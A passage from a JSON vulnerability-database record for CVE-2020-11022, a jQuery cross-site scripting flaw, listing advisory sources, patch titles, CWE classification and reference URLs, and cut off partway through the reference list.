v1\n\niQIVAwUBX2t0HtzjgjWX9erEAQhpWg/+KolNmhmQCrst8TmYsC2IgSdHP+q0LKLj\ngdPZYu0ixOpwLLiAhrsoDXqL3H3w7UDSKkSISgPMEqEde4Vp+zI37O1q3E/P7CAj\nrfLGuL1UDEiy0q0g1BP13GrPlg6K4fR5wQAnTB6vD/ZY+wd50Z0T+NGAxd2w68bM\nR5q1kSOUPc4AZt25FORU2cmp775Y7DWazMWHC77uiJHgyCwVqLtdO09iEnglZDKJ\nBynwyT8exZKXxmmpE4QZ4X7wNo3Y0mTiRZo5eyxxQpwj9X+qw1V+pBdtMH/C1yhk\nJ+X1f+wDoe2jCx2bqPXqp6EgFSHnJNt96jV0oTdD0f8rMgWcBDStNXdagPBmBCBp\nt+Kq3BZx0Oqkig4f+DCEmoS0V0fB9UQLg0Q/M9p1bTfYQkbn+BMHL7CAp8UyAzPH\nA1HlnP7TtQgplFvoap82xt2pXh97VvI6x3sBGHyW4Fz0SykhRYx3dAgmqy5nEssl\n5ApWZ87M3l+2tUh4ZOJAtzRDt9sL5KQsXjp1jZaK/gWBsL4Suzr9AIrs4NmRmXnY\nTzxdXgIY6C+dWmB4TPhcJE5etcvtorqvs93d47yBdpRyO/IlbEw0vLUBdVZZuj9N\nmqp6RcHqDKm6Yv4B73Ud5my44wSRWVWtBxO6fivQOQG7iqCyIlA3M3LUMkVy+fxc\nbvmOI0eIsZw=Jhpi\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11022",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "162159",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-10",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2020-11",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.2
},
{
"db": "ICS CERT",
"id": "ICSA-22-055-02",
"trust": 0.9
},
{
"db": "JVN",
"id": "JVNVU99843134",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94912830",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94847990",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94973485",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-182-07",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-342-02",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-097-01",
"trust": 0.8
},
{
"db": "CERT@VDE",
"id": "VDE-2021-027",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171215",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159876",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "157850",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159353",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2429",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163559",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"id": "VAR-202004-2191",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:54:02.528000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2020-130",
"trust": 0.8,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 3.11 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202217 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-4693-1 drupal7 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=978f239ce60a8a08c53eb64ba189d0f6"
},
{
"title": "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204211 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203807 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202362 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205249 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e7014c0a68e8d9bc31a54125059176dc"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226393 - Security Advisory"
},
{
"title": "Red Hat: Moderate: ipa security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203936 - Security Advisory"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203247 - Security Advisory"
},
{
"title": "Red Hat: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204670 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus 8.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-10"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=0c6e8f969487f201b1d56f59bd98f443"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=e57a04f097f54c762da82263eadc1b8a"
},
{
"title": "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204847 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-02"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230556 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230554 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2020-11"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1519",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1519"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-130"
},
{
"title": "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-10"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231049 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231045 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231043 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231044 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231047 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204298 - Security Advisory"
},
{
"title": "Geolocation Playground",
"trust": 0.1,
"url": "https://github.com/blaufish/geo "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022 "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/korestreet/https-nj.gov---CVE-2020-11022 "
},
{
"title": "AlmostSignificant",
"trust": 0.1,
"url": "https://github.com/bartongroup/AlmostSignificant "
},
{
"title": "Bagel Patch Website\n\nTO DO:",
"trust": 0.1,
"url": "https://github.com/corey-schneider/bagel-shop "
},
{
"title": "JS_Encoder",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/JS_Encoder "
},
{
"title": "XSSPlayground\nWhat is XSS?",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/XSSPlayground "
},
{
"title": "jQuery XSS",
"trust": 0.1,
"url": "https://github.com/EmptyHeart5292/jQuery-XSS "
},
{
"title": "https://github.com/DanielRuf/snyk-js-jquery-565129",
"trust": 0.1,
"url": "https://github.com/DanielRuf/snyk-js-jquery-565129 "
},
{
"title": "CVE-2020-11022 CVE-2020-11023",
"trust": 0.1,
"url": "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 "
},
{
"title": "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements",
"trust": 0.1,
"url": "https://github.com/johnrearden/strings_attached "
},
{
"title": "CVEcrystalyer",
"trust": 0.1,
"url": "https://github.com/captcha-n00b/CVEcrystalyer "
},
{
"title": "CVE Sandbox :: jQuery",
"trust": 0.1,
"url": "https://github.com/cve-sandbox/jquery "
},
{
"title": "jQuery \u2014 New Wave JavaScript",
"trust": 0.1,
"url": "https://github.com/spurreiter/jquery "
},
{
"title": "Github Repository Security Alerts",
"trust": 0.1,
"url": "https://github.com/elifesciences/github-repo-security-alerts "
},
{
"title": "Case Study",
"trust": 0.1,
"url": "https://github.com/faizhaffizudin/Case-Study-Hamsa "
},
{
"title": "Retire HTML Parser",
"trust": 0.1,
"url": "https://github.com/marksowell/retire-html-parser "
},
{
"title": "https://github.com/octane23/CASE-STUDY-1",
"trust": 0.1,
"url": "https://github.com/octane23/CASE-STUDY-1 "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/ArrestX/--POC "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/POC-Notes "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/Pentest-Notes "
},
{
"title": "Vulnerability",
"trust": 0.1,
"url": "https://github.com/tzwlhack/Vulnerability "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/KayCHENvip/vulnerability-poc "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/Threekiii/Awesome-POC "
},
{
"title": "\u6b22\u8fce\u5173\u6ce8\u963f\u5c14\u6cd5\u5b9e\u9a8c\u5ba4\u5fae\u4fe1\u516c\u4f17\u53f7",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/sec-daily-2020 "
},
{
"title": "SecBooks\nSecBooks\u76ee\u5f55",
"trust": 0.1,
"url": "https://github.com/SexyBeast233/SecBooks "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 1.3,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.3,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-gxr4-xjj5-5px2"
},
{
"trust": 1.2,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.2,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-10"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-11"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/162159/jquery-1.2-cross-site-scripting.html"
},
{
"trust": 1.2,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"trust": 1.2,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.2,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3ccommits.airflow.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94912830/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu94847990/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99843134/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94973485/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-097-01"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-342-02"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07"
},
{
"trust": 0.8,
"url": "https://cert.vde.com/en/advisories/vde-2021-027/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:2217"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3ccommits.airflow.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
